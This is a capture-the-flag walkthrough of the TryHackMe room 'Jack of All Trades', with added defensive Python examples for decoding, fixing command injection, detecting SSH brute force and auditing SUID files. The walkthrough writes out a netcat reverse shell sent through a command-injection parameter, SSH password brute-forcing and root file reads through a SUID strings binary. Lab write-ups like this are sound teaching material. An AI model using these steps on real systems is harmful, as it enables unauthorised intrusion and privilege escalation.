Jack Of All Trades WalkThrough

Neetam Kumar
Jul 2, 2023


Table of contents:

Reconnaissance

Exploitation

Privilege Escalation

Heyyyy guys….

TryHackMe Challenge Link: https://tryhackme.com/room/jackofalltrades

Now we are going to exploit the TryHackMe machine jack-of-all-trades.
This is an easy machine that requires a little knowledge of steganography, cipher encoding and decoding, and privilege escalation.

Reconnaissance:

After powering up your machine, perform the port scanning with any tool you are familiar with. Personally, I use Nmap which is a very good tool for finding ports and services.

There are only two ports open: 22 and 80, which are normally used for SSH (22) and HTTP (80).

But here the two ports are running each other's service: the web server is on 22 and SSH is on 80.
It seems like they shuffled the services on purpose.

So we go to our browser and open the IP with the port number to get the page, but the browser refuses to connect: port 22 is on Firefox's list of banned ports.

So we open a new tab in Firefox (as we are using the Firefox browser) and type "about:config".

There you can see a search bar. Type "network.security.ports.banned.override", set it as a String and give it the value 22, so the browser allows that port.

Now we can see the homepage (jack-of-all-trades)

and the first thing we do is check the source code of the page. Hardcoded credentials and commented-out text often turn up there, and they serve as hints on the journey of exploiting the machine.

We can see a note saying

“Note to self — If I ever get locked out I can get back in at /recovery.php!”

and a base64-encoded text underneath it. After decoding the base64 text, we get

“Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: <password>”

We can see there is a "recovery.php" page as well, so we browsed to it,

looked at its source code and found a base32-encoded string.

After decoding the base32 we got ASCII-encoded text, and after decoding that we could see it was rot13.

So this is a 3-layer encoded text. After decoding the rot13, we got the text:

“Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here’s a hint: bit.ly/2TvYQ2S”
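The three-layer decoding described above (base32, then ASCII character codes, then rot13) is easy to get wrong by hand, so here is a small decoder as an added example; it is not code from the room or from the author. The page only calls the middle layer "ascii-encoded", so treating it as ASCII codes written in hex (with whitespace-separated decimal codes handled too) is this example's assumption, and the sample string is constructed here by encoding a made-up message, not the room's real string.

```python
import base64
import codecs
import re

# Middle layer: ASCII character codes written either as hex pairs ("48656c6c6f")
# or as whitespace-separated decimal numbers ("72 101 108"). This is an
# assumption about what the page calls "ascii-encoded".
HEX_CODES = re.compile(r"^(?:[0-9a-fA-F]{2}\s*)+$")
DEC_CODES = re.compile(r"^(?:\d{1,3}\s+)*\d{1,3}$")


def decode_base32(text: str) -> str:
    """Layer 1: base32 (RFC 4648). Whitespace is removed before decoding."""
    return base64.b32decode("".join(text.split())).decode("ascii")


def decode_ascii_codes(text: str) -> str:
    """Layer 2: ASCII character codes -> text. Hex is tried first because a run of
    two-digit groups is unambiguous; decimal codes must be whitespace-separated
    (a decimal string made only of two-digit groups would be misread as hex)."""
    s = text.strip()
    if HEX_CODES.fullmatch(s):
        return bytes.fromhex("".join(s.split())).decode("ascii")
    if DEC_CODES.fullmatch(s):
        return "".join(chr(int(n)) for n in s.split())
    raise ValueError("middle layer is neither hex nor decimal ASCII codes")


def decode_rot13(text: str) -> str:
    """Layer 3: rot13 is its own inverse, so decoding is the same substitution."""
    return codecs.decode(text, "rot_13")


def decode_layers(blob: str) -> str:
    """Peel the layers in the order the page found them: base32 -> codes -> rot13."""
    return decode_rot13(decode_ascii_codes(decode_base32(blob)))


def encode_layers(message: str) -> str:
    """Apply the same three layers in reverse; used here only to build a sample."""
    rot = codecs.encode(message, "rot_13")
    hexed = rot.encode("ascii").hex()
    return base64.b32encode(hexed.encode("ascii")).decode("ascii")


# Constructed sample (not the room's real string): a known message run through
# all three layers so the decoder can be checked against it.
SAMPLE_MESSAGE = "The recovery login credentials are hidden on the homepage!"
SAMPLE_BLOB = encode_layers(SAMPLE_MESSAGE)

if __name__ == "__main__":
    print("encoded:", SAMPLE_BLOB)
    print("decoded:", decode_layers(SAMPLE_BLOB))
```

Running the file prints the constructed blob and the recovered message; to use it on a real string, call decode_layers() with the page's base32 text. If decode_ascii_codes() raises, the middle layer is something other than hex or decimal codes and needs a look by hand.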

Seriously, I didn't get the hint, but the text says the recovery login creds are on the homepage.

So I looked at the source code of the homepage again and found a steg.jpg image, which made me wonder whether steganography was in play here. So I saved the image and tried
extracting from it with the Steghide tool. It asked for a passphrase; since we already had a password from the base64-decoded note, I used that, and it worked.

The Steghide tool extracted a file called “creds.txt” and there is a text in the file saying

Hehe. Gotcha!

You’re on the right path, but wrong image!

Then we saved all the images on the home page and tried the password against each of them, and got a file extracted from the header.jpg image.

This file contains the username and password for the recovery login.

Exploitation:

So we logged in on the recovery.php page and were redirected to "/nnxhweOV/index.php".

After reading the text I suspected that command injection might be possible, so I tried
"?cmd=whoami"

and it worked: command injection is possible. So we tried to get a reverse shell through the command injection vulnerability. After trying a few reverse shells, I found one that works: "nc -c sh <yourip> <yourport>".
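For the defensive side of the bug above: the page's ?cmd= parameter works because user input reaches a shell that parses it. The following is an added example (not code from the room or from the author) that puts the vulnerable pattern beside its fix in Python, using `echo` as a stand-in for whatever tool the endpoint was meant to run so the demo runs anywhere; the HOST_RE allowlist is this example's assumption about what a legitimate host argument looks like.

```python
import re
import subprocess

# Allowlist for what a host argument may legitimately contain (assumption:
# hostnames and dotted IPv4 addresses only). Anything else is rejected outright.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def run_vulnerable(host: str) -> str:
    """The pattern behind a ?cmd= bug: user input is spliced into a string that
    /bin/sh parses, so ';', '|', '$()' and friends start new commands.
    `echo` stands in for the real tool (e.g. ping) so this runs anywhere."""
    completed = subprocess.run(f"echo {host}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def run_hardened(host: str) -> str:
    """Fix: validate against an allowlist, then hand the value to the program as
    one argv element with no shell involved, so metacharacters carry no meaning."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host argument: {host!r}")
    completed = subprocess.run(["echo", host], capture_output=True, text=True)
    return completed.stdout


def hardened_accepts(host: str) -> bool:
    """True if the hardened path would run the tool for this input."""
    try:
        run_hardened(host)
        return True
    except ValueError:
        return False


def count_commands_executed(output: str) -> int:
    """Each command `echo` runs prints its own line; more than one line means
    the shell ran something the caller never intended."""
    return len(output.splitlines())


if __name__ == "__main__":
    tainted = "example.com; echo INJECTED"   # constructed test input
    print("vulnerable ran", count_commands_executed(run_vulnerable(tainted)), "commands")
    print("hardened accepts tainted input:", hardened_accepts(tainted))
```

The real lesson of the room's endpoint is that there was no legitimate reason to pass a browser parameter to a shell at all; where a tool genuinely must be run, the argv-list form plus an allowlist is the minimum, and the web server should also run as an unprivileged account so a successful injection yields as little as possible.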

Start a listener on your machine and execute the command in the browser.

nc -nvlp 5554

Then we got a shell, but not an interactive one. We tried to get an interactive shell but it was no use, so we went to the home folder to look for hints, and we found a file called
"jacks_password_list". This file contains a list of passwords.

We have an SSH port open, so we can brute-force the SSH login with the passwords from that list,
and one of the passwords gets us into the machine.
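From the blue-team side, the password spraying against SSH described above is noisy: every failed attempt is written to the auth log. As an added example (not from the room or the author), here is a small detector that reads OpenSSH "Failed password" lines in syslog format and flags any source address that fails a threshold number of times inside a sliding window. The log lines are constructed for the example; the hostname "jack", the addresses and the threshold of 5 failures in 60 seconds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Classic OpenSSH failure line as written to /var/log/auth.log (syslog format).
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failure(line: str, year: int = 2023):
    """Return (timestamp, user, ip) for a failed-password line, else None.
    Syslog omits the year, so the caller supplies it."""
    m = FAILED_RE.match(" ".join(line.split()))  # collapse the padded day field
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_seconds=60, year=2023):
    """Flag source IPs with `threshold` or more failures inside any sliding
    window of `window_seconds`. Lines are expected in chronological order.
    Returns {ip: timestamp at which the threshold was first crossed}."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_failure(line, year)
        if parsed is None:
            continue
        ts, _user, ip = parsed
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


# Constructed sample log (not real data): one address hammering the jack
# account, one stray failure from elsewhere, then a success.
SAMPLE_LOG = [
    "Jul  2 10:15:01 jack sshd[1201]: Failed password for jack from 10.0.0.5 port 40001 ssh2",
    "Jul  2 10:15:03 jack sshd[1203]: Failed password for jack from 10.0.0.5 port 40002 ssh2",
    "Jul  2 10:15:05 jack sshd[1205]: Failed password for invalid user admin from 10.0.0.9 port 51000 ssh2",
    "Jul  2 10:15:06 jack sshd[1207]: Failed password for jack from 10.0.0.5 port 40003 ssh2",
    "Jul  2 10:15:08 jack sshd[1209]: Failed password for jack from 10.0.0.5 port 40004 ssh2",
    "Jul  2 10:15:11 jack sshd[1211]: Failed password for jack from 10.0.0.5 port 40005 ssh2",
    "Jul  2 10:15:40 jack sshd[1213]: Accepted password for jack from 10.0.0.5 port 40006 ssh2",
]

if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG).items():
        print(f"brute-force suspected from {ip} at {when:%H:%M:%S}")
```

On a real host the same logic is what tools such as fail2ban automate; the more durable fix for this machine would be disabling password authentication for SSH entirely and keeping password lists out of the user's home directory.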

We can see there is an image called user.jpg, and we can download it with
scp -P 80 jack@<serverip>:/home/jack/user.jpg <localpath>
where <localpath> is the directory you want the image downloaded to.

Opening the image we can find the user’s flag.

Privilege Escalation:

Now it is time for privilege escalation. Since we have Jack's password, we can use sudo -l to see whether there is any file Jack can run with root permissions, but sadly we cannot run anything.
So the next step is to look for SUID executable files.

strings shouldn't have that permission, and a quick search on GTFOBins shows that a SUID strings lets us read files the current user is not allowed to access.

So we read "/root/root.txt" and got the root flag.
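The SUID search above is exactly the check an administrator should be running too: list every file carrying the setuid or setgid bit and compare it with what the system is supposed to have. The following is an added example (not code from the room or the author) that does that comparison. The EXPECTED_SUID baseline is an illustrative assumption for a Debian/Ubuntu-style system, not an authoritative list; a real baseline should come from a known-good build of the same image. SAMPLE_ENTRIES is constructed data so the classifier can be checked without walking a real filesystem.

```python
import os
import stat

# Binaries that commonly carry the SUID bit on a Debian/Ubuntu-style system.
# Illustrative baseline (assumption); take the real one from a known-good image.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping",
}

SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems, never interesting here


def classify_suid(entries, baseline=EXPECTED_SUID):
    """entries: iterable of (path, st_mode). Returns the sorted list of regular
    files with SUID or SGID set that are not in the baseline, i.e. what
    `find / -perm -4000` shows minus what you already expected to see."""
    unexpected = []
    for path, mode in entries:
        if not stat.S_ISREG(mode):
            continue  # the bit on directories/symlinks is not an execution risk
        if mode & (stat.S_ISUID | stat.S_ISGID) and path not in baseline:
            unexpected.append(path)
    return sorted(unexpected)


def walk_modes(root="/"):
    """Yield (path, st_mode) for every file under root. lstat is used so a
    symlink is reported as a link rather than as its target."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue  # unreadable or vanished entry; skip it


def audit(root="/"):
    """Walk the filesystem and report unexpected SUID/SGID files."""
    return classify_suid(walk_modes(root))


# Constructed sample (not taken from the room): the modes are what os.lstat
# would return for a SUID passwd, a SUID strings, a plain ls, a SUID-marked
# directory and an SGID wall.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/strings", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/ls", stat.S_IFREG | 0o755),
    ("/tmp/suiddir", stat.S_IFDIR | stat.S_ISUID | 0o755),
    ("/usr/bin/wall", stat.S_IFREG | stat.S_ISGID | 0o755),
]

if __name__ == "__main__":
    print("sample:", classify_suid(SAMPLE_ENTRIES))
    for path in audit():
        print("unexpected SUID/SGID:", path)
```

Run as root for complete coverage (unreadable directories are silently skipped otherwise). The useful habit is to keep the output of the first run as the baseline and alert on any new entry; a stray SUID strings, like the one on this box, shows up immediately as a diff.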

Thanks to the community.

If you like the blog post give us a clap.
